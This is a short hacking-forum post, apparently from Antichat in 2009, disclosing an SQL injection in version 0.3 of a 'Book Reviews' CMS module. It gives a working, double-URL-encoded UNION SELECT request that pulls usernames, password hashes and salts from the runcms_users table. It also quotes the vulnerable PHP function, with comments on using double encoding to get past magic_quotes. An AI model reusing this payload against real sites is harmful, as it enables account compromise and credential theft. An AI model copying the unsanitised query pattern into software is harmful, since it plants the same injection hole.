27.02.2009, 19:05
|
|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами:
10058786
Репутация:
4589
|
|
Book Reviews
Версия: 0.3
Уязвимый скрипт: index.php
Запрос:
Код:
/modules/mareviews/?func=catlist&category=%252d%2531%2527%2520%2575%256e%2569%256f%256e%2520%2573%2565%256c%2565%2563%2574%2520%2563%256f%256e%2563%2561%2574%255f%2577%2573%2528%2530%2578%2533%2561%252c%2570%2561%2573%2573%252c%2570%2577%2564%2573%2561%256c%2574%2529%252c%2575%256e%2561%256d%2565%252c%2533%2520%2566%2572%256f%256d%2520%2572%2575%256e%2563%256d%2573%255f%2575%2573%2565%2572%2573%2523
Уязвимый кусок кода:
PHP код:
function show_catlist($category) {
global $isbn, $title, $db;
// а благодаря этому можно заюзать concat для гламурности,
// а так-же забыть про magic_quotes ..
// .. дважды заURLэнкодив иньекцию
$category = urldecode($category);
$table = $db->prefix()."_mareviews";
/*
* Set display title
*/
$box_title = $category." - Reviews";
$content = "<table>";
$sql = "
SELECT title, author, id
FROM $table
WHERE category = '$category'
ORDER BY author, title";
$result = $db->query($sql);
|
|
|